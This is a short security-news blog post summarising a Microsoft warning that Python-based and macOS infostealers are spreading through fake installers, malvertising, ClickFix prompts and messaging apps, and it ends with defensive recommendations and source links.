top of page
Search

Microsoft Warns: Python Infostealers Expand from Windows to macOS

  • Feb 4
  • 2 min read

Key Findings:


  • Microsoft warns that info-stealing attacks are "rapidly expanding" beyond Windows to target Apple macOS environments.

  • Attackers are leveraging cross-platform languages like Python and abusing trusted platforms to distribute infostealer malware at scale.


Background


  • Since late 2025, Microsoft has observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix-style prompts and malicious DMG installers.

  • These campaigns deploy macOS-specific infostealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS) using fileless execution, native macOS utilities, and AppleScript automation.

  • The attacks harvest credentials, session data, and secrets from web browsers, keychains, and developer environments.


Python-based Infostealers


  • Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead.

  • Malware like PXA Stealer, linked to Vietnamese-speaking threat actors, can harvest login credentials, financial information, and browser data.

  • Attackers have used phishing emails to distribute PXA Stealer, leveraging registry Run keys, scheduled tasks, and Telegram for persistence and command-and-control.


Abuse of Trusted Platforms


  • Bad actors have been observed weaponizing popular messaging apps like WhatsApp to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

  • Fake PDF editors like Crystal PDF are also being distributed via malvertising and SEO poisoning to deploy Windows-based stealers that can steal cookies, session data, and credential caches.


Recommendations


  • Educate users on social engineering attacks like malvertising redirect chains, fake installers, and ClickFix-style copy-paste prompts.

  • Monitor for suspicious Terminal activity and access to the iCloud Keychain, and inspect network egress for POST requests to newly registered or suspicious domains.

  • Strengthen defenses against Python and LOLBIN abuse, enable cloud-delivered protection and EDR in block mode, and apply attack surface reduction rules.


Sources


  • https://thehackernews.com/2026/02/microsoft-warns-python-infostealers.html

  • https://securityaffairs.com/187608/security/microsoft-info-stealing-malware-expands-from-windows-to-macos.html

  • https://x.com/TheCyberSecHub/status/2018966095005356318

  • https://medium.com/@costigermano/microsoft-warns-python-infostealers-are-expanding-to-macos-through-fake-ads-and-installers-eda30b224507

  • https://www.thedailystar.net/tech-startup/news/infostealers-target-macos-fake-ads-and-installers-microsoft-says-4098001

  • https://www.cypro.se/2026/02/04/microsoft-warns-python-infostealers-target-macos-via-fake-ads-and-installers/

Recent Posts

See All

Comments

  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page